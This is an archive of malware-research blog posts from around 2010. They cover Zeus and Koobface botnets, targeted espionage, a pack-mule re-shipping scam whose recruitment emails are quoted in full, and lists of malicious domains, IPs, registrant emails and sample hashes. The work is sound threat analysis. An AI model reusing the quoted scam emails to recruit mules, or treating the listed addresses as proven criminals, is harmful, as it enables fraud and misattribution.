Posts tagged “Malware”

2010 and Beyond



The year of 2010 has been an interesting for malware researchers. From the attacks on Google through to the ShadowNet there have been many interesting cases that targeted high profile targets. However, traditional threats such as Zeus, Spyeye and fake antivirus software continue to be what most Internet users face on a daily basis. Moreover, while attacks that are motivated by politics and espionage are increasing, money continues to be the primary driving force in the malware ecosystem. Here’s my thoughts on some of the trends I’ve focused on this year that we can expect to continue into 2011.

Political motivated DoS attacks
Denial of service attacks continue to be used in order to deny access to web sites at critical times. While the attacks by Anonymous in support of Wikileaks (see Arbor’s analysis here and here) have received much media attention, the website of Wikileaks was attacked just prior to the release of leaked diplomatic cables. However, as the Berkman Center has documented, (distributed) denial of service attacks against non-governmental and independent media continue with an alarming frequency. These attacks are aimed at disabling access to key information resources at specific points in time.

My colleagues Deibert and Rohozinski argue that “[d]isabling or attacking critical information assets at key moments in time—during elections or public demonstrations, for example—may be the most effective tool for influencing political outcomes in cyberspace.” In order to achieve this level of “on demand” disruption, those behind the attacks often outsource these types of attacks to botnets for hire thus blurring the boundaries between cybercrime and politically motivated attacks. We can expect to see a continuation of politically motivated DoS attacks in 2011.

Cyber-espionage
The year of 2010 began with the attacks on Google, dubbed Operation Aurora, which dramatically increased awareness of targeted malware attacks and signified that it is acceptable, and even prudent, that companies disclose such attacks. In fact, some companies began including warnings about such attacks in their SEC filings. However, it is not just companies that are the targets of such attacks, human rights organizations and government systems are compromised as well. In April 2010, the Information Warfare Monitor and the Shadowserver Foundation released a report “Shadows in the Cloud: An investigation into cyber espionage 2.0” in which we document a targeted malware network that extracted secret, confidential and restricted documents from the Indian government and military. (While this report was a follow-up to our previous report on cyber-espionage, “Tracking GhostNet” the networks are quite separate.)

While responsibility for such attacks are often attributed to state entities, 2010 also saw a series of attacks linked to the Zeus malware that appeared a lot more like espionage than crime. After Netwitness released a report on the Kneber botnet, a Zeus-based botnet with domain names registered to hilarykneber@yahoo.com, I focused on the connections between that botnet and a series of attacks against .mil and .gov email addresses using social engineering techniques. Have criminals determined that there is a market for sensitive data? It sure seems that way to me.

Abusing the Cloud
In “Shadows in the Cloud: An investigation into cyber espionage 2.0” my co-authors and I analyzed the command and control infrastructure of a network that used a complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. Of course, such techniques are not new, in 2009, researchers found that Twitter, Jaiku, Tumblr, Google Groups, Google AppEngine and Facebook had all been used as the command and control structure for malware. In 2010, Sunbelt found a Twitter botnet creator and Trend Micro reports that the “Here You Have” worm used GMail accounts.

During my analysis of malware posted on the Contagio blog, I noticed that the malware used an encrypted connection to Gmail as a means of command and control. (It also used cloud storage at drivehq.com in order to have the compromised computers download additional malware components). As network defenses continue to include traffic analysis, I believe that we will continue to see a move toward using popular services, especially web mail as command and control elements. Unlike connections to well-known dynamic DNS services, connections to Gmail and other popular services do not necessarily stand out and are encrypted.

Big Money
Although there are interesting target malware attacks that appear to have political motives, money continues to be the driving force behind the bulk of malware encountered by most Internet users. Cybercrime is profitable. In 2010, the Information Warfare Monitor released a report that documented the inner workings of Koobface. Koobface is a notorious botnet that leverages social networking platforms to propagate. The operators of Koobface have been able to successfully monetize their operations. Through the use of pay-per-click and pay-per-install affiliate programs, Koobface was able to earn over US$2 million between June 2009 and June 2010 by forcing compromised computers to install fake antivirus software and engage in click fraud. (BlackHat SEO operators monetize their operations in a similar way., see here and here.)

However, more traditional heists based on stolen banking and credit card credentials continue thanks to malware such as Zeus and SpyEye. This year, law enforcement were able to arrest individuals that used the Zeus malware to steal $70 million dollars. Often, these operations recruit money mules and pack mules to relay stolen money and goods bought with stolen credit cards. This makes it difficult to apprehend those behind these operations.

Pack Mules: The Re-Shipping Fraud & Malware Connection



Malware toolkits are designed to steal information, such as bank account data, and provide cyber criminals with vast quantities of stolen credentials. Every day, credit card numbers stolen by malware such as Zeus and SpyEye are bought and sold in the underground economy. This has given rise to the recruitment of “pack mules.”

When using stolen credit card numbers to make purchases online, criminals do not provide their own identity or location information. Instead, criminals post advertisements on job search Web sites in order to lure “pack mules” to act as intermediaries in their criminal operations. These intermediaries receive merchandise on the criminal’s behalf and re-ship it to a location under the control of the criminals. This operation is known as “re-shipping fraud” and is similar to the ways in which some criminals recruit “money mules” to open bank accounts for transferring stolen funds.

Re-shipping is tightly intertwined with malware activity. This is demonstrated by the fact that the Web sites used to recruit pack mules are hosted on the same servers that host the command-and-control servers of Zeus botnets. I have been exploring (see Clustering Zeus Command and Control Servers Part 1 and Part 2) clusters of Zeus activity in an attempt to better understand the connections among the criminals behind different functions within the botnet ecosystem. I have found that although Zeus is a popular malware toolkit that any aspiring criminal can use to setup a botnet capable of stealing credit card and banking information, there is a cluster of malicious Zeus servers which indicate that there is a “core” of Zeus operations.

In this blog post, I analyze the pack mule recruiting Web site, “Sullivan and Myers,” (sullivanmyers.com) and explore its links with Zeus botnets and the broader malware underground. This investigation indicates that these concentrations of malicious activities go beyond operating command-and-control servers and extracting banking information to other aspects of the criminal enterprise. This includes exploitation (through “exploit packs“) and the recruiting of pack and money mules.

Pack Mule Recruitment

In order to recruit pack mules, criminals setup Web sites that purport to belong to a legitimate shipping and receiving business, and post advertisements that link to the “business” on job search Web sites and forums. This can be seen in the case of Sullivan and Myers, a fake business created for the purpose of recruiting pack mules.

Sullivan and Myer’s job posting invites interested applicants to complete an online application form and submit a resume to hr@sullivanmyers.com. Sullivan and Myer’s contact information (address, phone, and fax number) is also supplied. The application form, contact information, and the company’s Web site appear to have been designed to create a sense of legitimacy. Although there are some indicators that suggest the company may be fake, such as awkward language and occasional errors (using “Myers & Sullivan” instead of “Sullivan and Myers”), the overall presentation is passable. To some applicants, the company may appear to be legitimate.

After submitting a resume, applicants are given additional information about the position. The applicants are informed that they will be receiving packages which they are to re-package and send to the company’s “consumers.” The applicants are told that they can earn up to USD3000 per month.

Human Resource hr@sullivanmyers.com

Your documents has been verified and checked; you seem to be a suitable
candidate for Junior Packing Specialists’ position and we are glad, that you are
interested in this opening.

Following, you’ll find information about Sullivan & Myers and additional details
about Junior Packing Specialist position.

Sullivan & Myers (NASDAQ: SUM) is a well known printing and typography company
that offers wide variety of printing, publishing and general advertising
services. Company is based in US with headquarters in GA, Atlanta. If you want
to find out more about Sullivan & Myers, please visit our web site
www.sullivanmyers.com

This is a part-time job with a flexible schedule. Work time is not
limited, but to be successful you need to devote at least 10hrs per week to it,
though those who work up to 20hr/week have best results in the company.

This is a part-time job and it can be rendered at home, thus all but few

communications will be handled online, because of this job requirements include
acceptable level of computer literacy and Internet access. There is no entrance
or any other hidden fee. The company covers all the fees related to this
employment.

Junior packing specialist’s job is quite simple, currently Sullivan & Myers
provide a complex package of services for a network of a well-known consumer’s
electronics company, you will be receiving scheduled packages from them. The
parcels mostly consist of electronics and consumer goods with no oversized
deliveries. You shall receive a specialized packing paper from Sullivan & Myers
or its affiliates, part of it will be a decal paper, picturing different
advertisements from our client’s partner, some might only be protective wrapping
to provide additional security to fragile goods. Junior Packing specialist’s job
is simple, you need to repack each package & parcel and make sure that
consistence of package is fully operational or/and lacking visual defects and
forward it to consumers via USPS or FED EX. You might receive up to 10 packages
per week (during your trial period) thus as we already mentioned we require at
least 10hrs to be dedicated to this job.

To the successful applicants we offer a position on a trial period (30
business days, from the first actual assignment). This is the period when you
will be trained and shall receive 24/7 online and phone support, while earning
money. The evaluation of employees on a trial period is usually at least one
week before the end of their trial period. During the trial period, the
supervisor can recommend termination. At the end of the trial period, supervisor
makes his decision.

The trial period is paid $1390 USD per month. For every successful mail/parcel
forwarded you will receive $35, also you shall receive an additional bonus of
$15 per parcel that you send at the day of delivery, for example, if you have
received a parcel at 01.05.2010 and forwarded it at the same day, you shall
receive not $35 but $50 commission. Your total income, with the current volume
of clients, will be added up to $3000 USD per month. Your base salary, after
trial period, will go up to $1900 per month, plus $45 per parcel you forward.

You may ask for additional hours after trial period, or proceed full-time.
If you are interested in this job, please reply to this e-mail and our HR
managers will send you all required paperwork.

Next, applicants are sent a contract and are then instructed to send copies of identification and proof of residency for a background check to minimize fraud. This is an important step because if, at a later point, the applicant determines that the company is not legitimate and wants to quit, the criminals behind this operation could attempt identity theft or otherwise compromise the individual.

Human Resource hr@sullivanmyers.com:

In this e-mail, you will find attached legal document specifically a labor
contract for Junior Packing Specialist position in Sullivan & Myers.

Make sure you read it carefully, familiarize yourself with all aspects of
the agreement and in case if you agree with the terms do the following:

1. Print out two (2) copies of the labor contract.
2. Sign both parts, you must sign it on the bottom of EVERY page,
plus at the end of the document.
3. Forward one part to Sullivan & Myers HR department at
hr@sullivanmyers.com or fax it to 1-(678)-866-2530
4. Keep one signed copy for yourself.

The contract becomes valid from the moment of the reception of the
correctly filled copy of the contract. It should be noted that the validity
of the contract in the electronic form is identical to the contract signed
in personal presence of both parties.

In order to minimize fraudulent activities we have implemented strong
security policy, we are running mandatory background checks for every
successful candidate. Background check includes but is not limited to,
criminal, financial or personal records that are available publicly. In VERY
rare cases, Sullivan & Myers may enforce PI. As a part of our security
policy we ask you to make an electronic copy of your ID, driving license or
any other legal document that may verify your identity (any utility bill
will do, if your domicile is mentioned there) and send it attached with the
same e-mail or fax it to 1-(678)-866-2530.

You will receive additional information when your forwarded contract will
be examined and verified by our attorneys.

*NOTE: Requires manual signature.

After receiving the signed contract, the criminals confirm the mailing address of the new “employee.” At this point, the new employee will begin receiving packages of goods bought with stolen credit card information and forwarding these goods to the criminals behind the operation. When law enforcement tracks down the operation, they will be led to the address of the pack mule rather than the masterminds behind the operation.

The Malware Connection

Locating Sullivan and Myers within the malware ecosystem exposes the criminal connections of those behind the re-shipping fraud operation. The Web site sullivanmyers.com is registered to the e-mail address migray71@yahoo.com and resolves to the IP address 194.28.112.11. Migray71@yahoo.com is linked to significant malicious activity.

The hosting history of sullivanmyers.com firmly places the domain within concentrations of malicious activity. Currently, the Web site is hosted on a server with the IP address 194.28.112.11. This server also hosts azkinternational.com (azkint@bronzemail.net), fotosharedownloads.com (hosting@haiau.tv) and fotoshare-dknc.com. Fotosharedownloads.com and fotoshare-dknc.com are Web sites that host malware, and azkinternational.com appears to be another pack mule recruiting Web site.

Sullivanmyers.com has been hosted on a number of servers that have hosted significant amounts of malicious activity in the last year. Currently, these servers are hosting domain names registered to known malicious e-mail addresses.

2010-11-06 223.25.242.61

– binmop.com – migray71@yahoo.com
– glazsystem.net – annepark@gmail.com
– nonameal.com – descartez@hotmail.com
– unknownplaces.net – mcthomas34@first-host.net

2010-09-24 27.131.32.153

– antiviruslab.info – mcthomas34@first-host.net
– bransac.com – descartez@hotmail.com
– myweb-analytics.net – migray71@yahoo.com
– organte.com – ddgrimes@earthlink.net

2010-09-13 113.11.194.158

– trackingcounter.net – trackingcounter.net@protecteddomainservices.com

2010-07-03 113.11.194.148

– baidum.net – edgar.marcha@verizon.net
– hpnet.in – socks5service@list.ru
– kiaz.org – analizsite@gmail.com
– kingolat.com – ddgrimes@earthlink.net
– mainspain.info – edgar.marcha@verizon.net
– maturesdf.com – MillieDiaz4@aol.com
– southdomens.com – southdomens@googlemail.com
– tarstall.ru – boats@qx8.ru
– topmilkyway.net – ddgrimes@earthlink.net
– truetry.org – analizsite@gmail.com
– vuvuzelya.net – edgar.marcha@verizon.net

The domain names listed above resolve to IP addresses of servers that were previously used to host sullivanmyers.com. While some of the domain names have already been linked to malicious activity, some have not. However, they are associated with e-mail addresses that have been used to register malicious domain names in the past.

Using data from MalwareDomainList and ZeusTracker, we can see the extent to which domain names registered by migray71@yahoo.com are engaged in malicious behavior and linked through co-hosting to other malicious domain names. These malicious domain names have been active throughout 2010 and have been used to host exploit packs, such as Pheonix and Eleonore; downloaders, such as Oficla/Sasfis, Fake Antivirus, the RussKill DDoS tool and multiple versions of the Zeus Trojan; and associated drop zones and command-and-control servers. This e-mail address was also used to register sosanni.com, a command-and-control server for the Ambler botnet.

The most interesting connection within this cluster links the activity of domain names registered with migray71@yahoo.com to the Ambler botnet and to a cluster of malicious Zeus activity. The domain name sosanni.com (migray71@yahoo.com – 121.101.216.205) was an Ambler command-and-control server that was operated by the same set of actors that administered a cluster of Zeus command-and-control servers registered with a variety of well- known e-mail addresses, including hilarykneber@yahoo.com, edgar.marcha@verizon.net, and MillieDiaz4@aol.com.

The hilarykneber@yahoo.com e-mail address was made infamous after Netwitness revealed the existence of a Zeus-based botnet associated with that email address that had compromised over 74,000 computers around the world. An association with the Kneber botnet indicates that those behind the operation have no shortage of stolen credit card numbers that could be used to make purchases that are re-shipped through the pack mule operation. Moreover, this cluster was found to be not only operating a Zeus botnet, but a SpyEye and the Ambler botnet as well. This indicates that the criminals are diversifying their operations using multiple forms of malware that are designed to steal credit card numbers, bank account information, and other credentials.

However, there are some limitations to this analysis. Just because domain names are hosted on the same server, it does not mean that there is necessarily a direct connection between them. There are a variety of “bullet proof” Web hosting companies that provide stable hosting to a wide variety of malicious activity. Online criminal prefer these services because the “bullet proof” hosts ensure that malicious Web sites remain online despite efforts of the security community to take them down.

Domain names registered with the same e-mail address provides a stronger link because this indicates that the domain names are under the control of one entity. However, domain names registered to the same e-mail address may not be directly linked. There are a variety of services available within the malware underground that include domain registration. For example, the domain name southdomens.com (southdomens@googlemail.com) is hosted on a server that sullivanmyers.com was formerly hosted on. The server is also associated with a service that provides domain name registration. If domain registration services register domain names for multiple clients with the same e-mail address, it provides a weak (rather than strong) link between malicious activity clustered around domain names registered with the same e-mail address. Domain names registered with the same e-mail address may be distributed by the supplier to an array of disparate criminals. So, rather than indicating a strong connection between the malicious actors using the domain names, it simply shows that disparate malicious actors sought the services of the same domain name provider.

Keeping these limitations in mind, I believe that while there are specialized roles within the malware ecosystem, there appears to be a significant portion that is quite centralized. In this case, domain names registered with the same e-mail addresses not only inhabit servers full of malicious activity, but are also associated with “pack mule” recruitment, exploit packs, and Zeus and Ambler command-and-control servers. While the exact nature of the connections between them are unclear, these concentrations indicate that a discrete set of criminals are behind an operation that goes full circle—from exploiting victims, to harvesting credentials to acquire goods which are relayed through a network of pack mules back to the criminals.

Koobface: Inside a Crimeware Network



The Information Warfare Monitor (Citizen Lab, Munk School of Global Affairs, University of Toronto and the SecDev Group, Ottawa) announce the release of Koobface: Inside a Crimeware Network by Nart Villeneuve, with a foreword by Ron Deibert and Rafal Rohozinski.

The full report can be accessed here (local mirror):

Globe and Mail coverage of the report can be accessed here:

Koobface is a notorious botnet that leverages social networking platforms to propagate. Since, people are much more likely to execute a malicious file if it has been sent to them by someone they know and trust, the Koobface operators, known as “Ali Baba and 40 LLC” have developed a system that that uses social networking platforms such as Facebook to send messages containing malicious links. These links redirect users to false YouTube pages that encourage users to download malicious software masquerading as a video codec or a software upgrade.

In late April 2010, I discovered archive files on a well known Koobface servers that provided an inside look at the operations and monetization strategies of the Koobface botnet. The contents of these archives revealed the malware, code, and database used to maintain Koobface. It also revealed information about Koobface’s affiliate programs and monetization strategies. There are three main issues that have stood out for me throughout this investigation.

The first is the level of Koobface’s financial success. The operators of Koobface have been able to successfully monetize their operations. Through the use of pay-per-click and pay-per-install affiliate programs, Koobface was able to earn over US$2 million between June 2009 and June 2010 by forcing compromised computers to install malicious software and engage in click fraud. This, of course, does not occur in a vacuuum but within a malware ecosystem that sustains and monetizes botnet operations.

The second concerns the countermeasures taken by Koobface against the security community.Koobface maintains a banlist of IP addresses that are forbidden from accessing Koobface servers. In addition, Koobface operators carefully monitor whether any of their URLs have been flagged as malicious by bit.ly or Facebook and they also monitor their malware links with the Google Safe Browsing API. This is part of a trend where malware authors check their malicious software against a variety of security products to ensure that there is only limited protection.

Finally, botnets such as Koobface present significant, but not impossible, challenges for law enforcement. Botnet operators leverage geography to their advantage, often exploiting Internet users from all countries but their own. While the total amount of criminal activity that the botnet operators engage in may be significant, the distribution of that criminal activity across multiple jurisdictions means that the criminal activity in any one jurisdiction is minimal. In addition, botnet operators leverage Internet infrastructure around the world, making it difficult to interfere with their operations.

However, botnet operators, such as those behind Koobface, do make mistakes. Information sharing and persistent monitoring can uncover the details of botnet operations. Therefore, it is important that the law enforcement and security community continue to share information and work closely together. An understanding of the inner workings of crimeware networks allows law enforcement to pursue leads and the security community to develop better defenses against malware attacks.

This report was made possible thanks to the guidance and encouragement of Ron Deibert and Rafal Rohozinski, the principal investigators of the Information Warfare Monitor. This report is built upon the research of members of the security community and I would like to thank all those who have documented the operations of Koobface over the years, especially Dancho Danchev and Trend Micro’s Threat Research Team. I would like to acknowledge and thank Chris Davis and Jose Nazario for sharing their knowledge and providing advice. In addition, I would like to thank the RCMP, the FBI, the UK Police, and AusCERT for their assistance. Finally, a special thanks is due to Jan Droemer who discovered the same data and shared his analysis and insights.

For more information on Koobface, see:

The Real Face of KOOBFACE: The Largest Web 2.0 Botnet Explained

The Heart of KOOBFACE: C&C and Social Network Propagation

Show Me the Money! The Monetization of KOOBFACE

Web 2.0 Botnet Evolution: KOOBFACE Revisited

Koobface Gang Responds to the “10 Things You Didn’t Know About the Koobface Gang Post”

Koobface – the social network trojan

Nobel Peace Prize, Amnesty HK and Malware



There have been two recent attacks involving human rights and malware. First, on November 7, 2010, contagiodump.blogspot.com posted an analysis of a malware attack that masqueraded as an invitation to attend an event put on by the Oslo Freedom Forum for Nobel Peace Prize winner Liu Xiaobo. The malware exploited a known vulnerability (CVE-2010-2883) in Adobe Reader/Acrobat. The Committee to Protect Journalists was hit by the same attack.

On November 10, 2010 Websense reported that website of Amnesty Hong Kong was compromised and was delivering an Internet Explorer 0day exploit (CVE-2010-3962) to visitors. In addition, Websense reports that the same malicious server was serving three additional exploits: a Flash exploit (CVE-2010-2884), a QuickTime exploit (CVE-2010-1799) and a Shockwave exploit (CVE-2010-3653).

The malicious domain name hosting the exploits mailexp.org (74.82.168.10) has been serving malware since Sept. 2010. The domain mailexp.org was registered in May 2010 to y_yum22@yahoo.com. mailexp.org was formerly hosted on 74.82.172.221 which now hosts the Zhejiang University Alumni Association website.

The malware dropped from the Internet Explorer exploit (CVE-2010-3962)
scvhost.txt
MD5: ca80564d93fbe6327ba6b094ae3c0445 VT: 2 /43

The malware dropped from the Flash exploit (CVE-2010-2884)
hha.exe
MD5: 0da04df8166e2c492e444e88ab052e9c VT: 2 /43

The malware dropped from the QuickTime exploit (CVE-2010-1799)
qq.exe
MD5: 3e54f1d3d56d3dbbfe6554547a99e97e VT: 16 /43

The malware dropped from the Shockwave exploit (CVE-2010-3653)
pdf.exe
MD5: 3a459ff98f070828059e415047e8d58c VT: 0/43

Both ca80564d93fbe6327ba6b094ae3c0445 and 3a459ff98f070828059e415047e8d58c perform a DNS lookup for ns.dns3-domain.com, which is an alias for centralserver.gicp.net which resolves to 221.218.165.24 (China Unicom Beijing province network).

The domain name “ns.dns3-domain.com” has been associated with a variety of malware going back to May 2010. This domain name, dns3-domain.com is registered to zhanglei@netthief.net, the developer of the NetThief RAT.

Malware attacks leveraging human rights issues are not new. I have been documenting them for some time (see, Human Rights and Malware Attacks, Targeted Malware Attack on Foreign Correspondent’s based in China, “0day”: Civil Society and Cyber Security). However, one of the issues that Greg Walton and I raised last year, is a trend toward using the real web sites of human rights organizations compromised and as vehicles to deliver 0day exploits to the visitors of the sites – many of whom may be staff and supporters of the specific organization. Unfortunately, we can expect this to continue.

Clustering Zeus Command and Control Servers Part 2



In Part 1 of “Clustering Zeus Command and Control Servers” I focused on clustering Zeus command and control servers based on three criteria: IP addresses, domain names, and email addresses used to register domain names. Using data drawn from ZeusTracker and MalwareDomainList, I observed that while a wide variety of criminals may set up disparate Zeus operations there may be “core” set of Zeus operations clustered around domain names registered five email addresses: abuseemaildhc@gmail.com, hilarykneber@yahoo.com, steven_lucas_2000@yahoo.com, tahli@yahoo.com and michell.gregory2009@yahoo.com. Beyond the common email addresses and co-hosting on servers with the same IP addresses (which, in general are hosting a wide variety of malware) the exact nature of the relationships remains unclear.

It is clear that there are certain servers that facilitate an abundance of malicious activity. However, caution must be exercised when conclusions are drawn regarding specific (groups of) actors operating discrete segments of botnet command and control servers among a common malicious infrastructure. Malware groups are often the customers of other malware groups or work with affiliates to propagate and monetize malware. Different groups may propagate malicious domain names that belong to other groups, or different groups may propagate common malicious domains that are provided by an affiliate network. In addition, there are malicious networks that provide hosting services to malware distributors and botnet operators. Therefore, links that appear between a variety of actors may not be as solid as the technical data alone would lead one to believe.

In order to examine these relationships further, I’m going to layer some qualitative data and analysis on the Zeus data analyzed in Part 1. Based on information I obtained from some of the command and control servers listed below (this is deliberately vague), combined with common file paths and the presence of the same files on different combinations of these servers, I believe that the following command and control domain names constitute of cluster of malicious activity operated by the same set of operators:

freehost21.tw – hilarykneber@yahoo.com – 109.196.143.60
bstservice.biz – accounseller@gmail.com – 195.5.161.73
fivefingers31.org – edgar.marcha@verizon.net – 195.149.88.86
coolparts31.tw – admin@google.name – 121.101.216.205
fhjslk21.com.tw – hilarykneber@yahoo.com – 195.5.161.208
bananajuice21.net – hilarykneber@yahoo.com – 109.196.143.56
cpadm21.cn – Dalas_Illarionov@yahooo.com – 91.212.41.31
gamecp12.cn – GameNet2010TX@yahoo.com – 222.73.37.203
admcp21.cn – Maria_lucas_2000@yahoo.com – 91.212.41.31
subaruservice.cn – hilarykneber@yahoo.com – 59.125.229.79
elektronservice.net – Steven Lucas steven_lucas_2000@yahoo.com – 59.125.229.79
promo-standart.info – MillieDiaz4@aol.com – 121.101.216.205
cpadm21.org – admin@cpadm21.org – 193.104.94.81
decp31.org – hilarykneber@yahoo.com – 119.255.23.209
coolparts31.org – skeletor71@comcast.net – 61.4.82.216
sosanni.com – migray71@yahoo.com – 121.101.216.205

This post will explore the relationships between these domains and other malicious activity, primarily Zeus activity, undertaken by other domain names registered with the same email addresses in order to explore the theory that there is a “core” of Zeus activity. While the malicious activity primarily relates to Zeus there are some significant exceptions. The domain name sosanni.com was used as a command and control server for the Ambler botnet. For the period I observed the Ambler activity, over 5000 IP addresses from compromised computers, 99% of which were from Russia, checked in with the command and control server. In addition, I found that coolparts31.tw was acting as a SpyEye command and control server in addition to a Zeus command and control server.

This screenshot shows the relationship between the command and control domain names, the malicious activity associated with them and the IP address that the domain name resolves to. While there are several instances in which some domain names were co-hosted on the same server, nearly half were not. This makes sense as operators will seek to diversify their hosting in order to avoid a complete shutdown should one of their command and control servers be taken down or blocked. In fact, look at the time span, covering October 2009 to September 2010 we can see how the operators moved their operations from one server to the next.

This operators of this malware cluster tend to host their command and control servers in Eastern Europe and China.

In order to assess this clusters possible linkages within the broader malware ecosystem, the data set was expanded to include a) other domain names registered with the same email addresses and b) the IP addresses of the servers associated with the malicious activity imported from ZeusTracker and MalwareDomainList. This extends the geographic scope of the hosting servers into North America, as well as the previous locations in Eastern Europe (UA, RU, CZ, MD) and South East Asia (CN, TW).

Looking at the relationships between the domains we see that there are two interesting clusters, and arguable a few smaller ones as well. These represent concentrations of servers registered with the same email addresses. The two main clusters are domain names registered to: steven_lucas_2000@yahoo.com and hilarykneber@yahoo.com.

An interesting fact about the “Lucas” cluster becomes apparent when you look at the time line of malicious activity (the date when the domain name was added to ZeusTracker or MalwareDomainList). The Lucas cluster is primarily active January – November 2009 (although there is some subsequent activity) while very few domains registered with other email addresses are active.

This is followed by the introduction of the “Kneber” domains which begin on the tail end of the Lucas cluster’s activity. The Kneber domain names begin in November 2009 and continue into October 2010. While the domain names registered with the remaining email addresses do also roughly follow a similar pattern of beginning while the previous one tails off, Kneber remains fairly constant once it begins.

In Part 1, I showed that there are clusters of Zeus activity that around a set of email addresses used to register domain names. Using qualitative data from my investigations, I’ve found a Zeus cluster that uses domain names registered by some, but not all, of these key email addresses including steven_lucas_2000@yahoo.com and hilarykneber@yahoo.com. This cluster has transitioned through domain names registered by a variety of email addresses over the last year. When the data set is expanded to include all the domain names registered by these email addresses in ZeusTracker and MalwareDomainList we see the same pattern of transition play out. This supports the theory that while Zeus is a toolkit that allows anyone to create a botnet, there is a “core” of Zeus activity.

However, this cluster of 16 domain names is only a small portion of the “core” Zeus activity associated with five key email addresses. According to DomainTools, about 1839 domain names in total:

abuseemaildhcp@gmail.com is associated with about 717 domains
hilarykneber@yahoo.com is associated with about 449 domains
steven_lucas_2000@yahoo.com is associated with about 110 domains
tahli@yahoo.com is associated with about 263 domains
michell.gregory2009@yahoo.com is associated with about 300 domains

These email addresses have been used to registered a variety of domain names associated with all manner of malicious activity, not exclusively Zeus activity. While this could be part of a centralized effort to distribute command and control servers to be operated by sub-groups, I am not sure that it is best to attribute all the malicious activity across these domains to the same set of actors. Even if these domain names represent the efforts of the same set of actors, they appear to be distributed to smaller groups of operators. These operators don’t necessarily have connections with others managing domain names hosted on the same infrastructure and/or registered with the same email addresses.

However, this simple clustering method does provide us with concentrations of malicious activity that should be investigated further. The introduction of qualitative data provides the ability to probe the operations of specific groups further. In the future I’d like to acquire a list of all 1800 domain names and layer on historical hosting data to see if any further patterns emerge.

Command and Control in the Cloud



In “Shadows in the Cloud: An investigation into cyber espionage 2.0” my co-authors and I analyzed the command and control infrastructure of a network that extracted secret, confidential and restricted documents from the Indian government and military. The Shadow Network used a complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. As we noted in the report, the use of these services as elements of command and control is certainly not new:

The use of social networking sites as elements of command and control for malware networks is not novel. The attackers leverage the normal operation of these systems in order to maintain control over compromised system. In 2009, researchers found that Twitter, Jaiku, Tumblr, Google Groups, Google AppEngine and Facebook had all been used as the command and control structure for malware. In August 2009, Arbor Networks’ Jose Nazario found that Twitter was being used as a command and control component for a malware network. In this case, the malware was an information stealer focused on extracting banking credentials from compromised computers located mostly in Brazil. Twitter was not the only channel being used by the attackers. They also used accounts on Jaiku and Tumblr (Nazario 2009a). Furthermore, Arbor Networks found another instance of malware that used the Google AppEngine to deliver malicious URLs to compromised computers (Nazario 2009b). The Unmask Parasites blog found that obfuscated scripts embedded in compromised web sites used the Twitter API to obscure their activities. While the method was clever, the code was unreliable and appeared to have been abandoned by the attackers (Unmask Parasites 2009). Symantec found that Google Groups were being used as command and control for another instance of malware. In this case, a private Google group was used by the attackers to send commands to compromised computers which then uploaded their responses to the same Group (Symantec 2009a) Symantec also found an instance of malware that used Facebook status messages as a mechanism of command and control. (Symantec 2009b). The use of these social networking and Web 2.0 tools allows the attackers to leverage the normal operation of these tools to obscure the command and control functions of malware.

Earlier this year, Sunbelt found a Twitter botnet creator and Trend Micro reports that the “Here You Have” worm used GMail accounts. As we found with the Shadow Network malware authors learn from each other. And in the case of the Shadow Network they didn’t just use one service they used six of them, including Yahoo! Mail. And while indiscriminate malware may be rather noisy, the malware used in targeted attacks tends to be (but is certainly not always) more discrete.

A recent sample posted at contagiodump.blogspot.com caught my attention for this very reason. The sample, “Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf” (which was sent from 221.9.247.17 and was detected by 14 /43 (32.6%) AV products at Virustotal) arrived with the subject line “Nuclear Challenges and Responses in the Century” and exploited a vulnerability in Adobe Reader/Acrobat (CVE-2010-2883) to drop malware on the targets’ computers. For those of you who follow Mila’s awesome blog, this scenario is hardly surprising.

But a few things caught my attention. There were references in the strings dumped from a file the malware created (syschk.ocx) that referenced GMail (mail.google.com) and DriveHQ (drivehq.com), which describes itself as a “cloud based storage, backup, group sharing and collaboration service.” When you look at the traffic generated by the malware you’ll see connections to these locations.

There is nothing about these locations that is very suspicious — everyone checks their GMail right? Moreover, the connection to GMail is SSL encrypted.

Using Burp (which made the process very simple) I MITM’d the traffic between the malware and GMail. The malware logs in to the GMail account and sends an email to another GMail address. The content of this email is encrypted. However, I believe that what it is sending — although this is just a hunch — is the content of another file the malware generates: form.ocx. This file contains what appears to be a unique ID assigned by the malware, the hostname and IP address, the default home page of the default browser and a listing of installed programs on the computer. The end of the file contains information about executables the malware has impacted. In addition to the encrypted message sent through the GMail account, the Unique ID in form.ocx appears at the beginning of the message.

IEXPLORE.EXE done
CHROME.EXE done
FIREFOX.EXE done

C:\WINDOWS\system32\form.ocx
Infect OK!

I have not looked into what exactly the malware does to these applications, but it basically disables the operation of FireFox and Chrome and instead connect to the Gmail account when you try to start these applications. Internet Explorer seems to function normally.

The connection to fuechei.chang.drivehq.com results in the download of an additional file rename.ocx which appears to be very similar, when its strings are compared with, syschk.ocx. It then renames syschk.ocx to syschk.ocx1. You can see that this correlates with text in the strings dumped from syschk.ocx.

%s\rename.ocx

http://%s/rename

%s\syschk.ocx1

After the initial connections to GMail and DriveHQ the malware went quiet. I never did get it to connect again.

As network defenses continue to include traffic analysis, I believe that we will continue to see a move toward using popular services, especially web mail as command and control elements. Unlike connections to well-known dynamic DNS services like 3322.org or abnormal connections to geographic regions, connections to GMail and other popular services do not necessarily stand out. Moreover, the connections to the services, such as GMail are encrypted, further obfuscating the malicious activity that is occurring.

Malware Diversification



There are wide varieties of malware, many of which have similar functionality. As a result there is a tendency to portray them as being in competition with on another. In some ways this is true, especially when it comes to malware authors, however, I prefer to see it as less of a rivalry and more of an opportunity for diversification on the part of the botnet operators. Recently there have been some articles that suggest that Zeus may be “dethroned” (“New threat set to dethrone Zeus“, “Online criminals are moving on from Zeus“) thanks to Bugat and Carberp.

Well, despite the recent arrests of over 150 individuals associated with Zeus-related bank fraud and the decline in the number of active Zeus command and control servers Zeus is still “going strong” and demonstrating its resilience.

However, this is not a property of the malware, but of the wide base of criminals that use it. While there may be a core of Zeus activity, anyone can use the Zeus toolkit to setup his or her own botnet. An additional factor to include is the fact that criminals make use of multiple malware kits, even rival malware kits.

The relationship between SpyEye (see two great SpyEye posts here and here) and ZeuS has been described as a rivalry — largely based on SpyEye’s ability to remove ZeuS from compromised computers — but botnet operators make use of both.

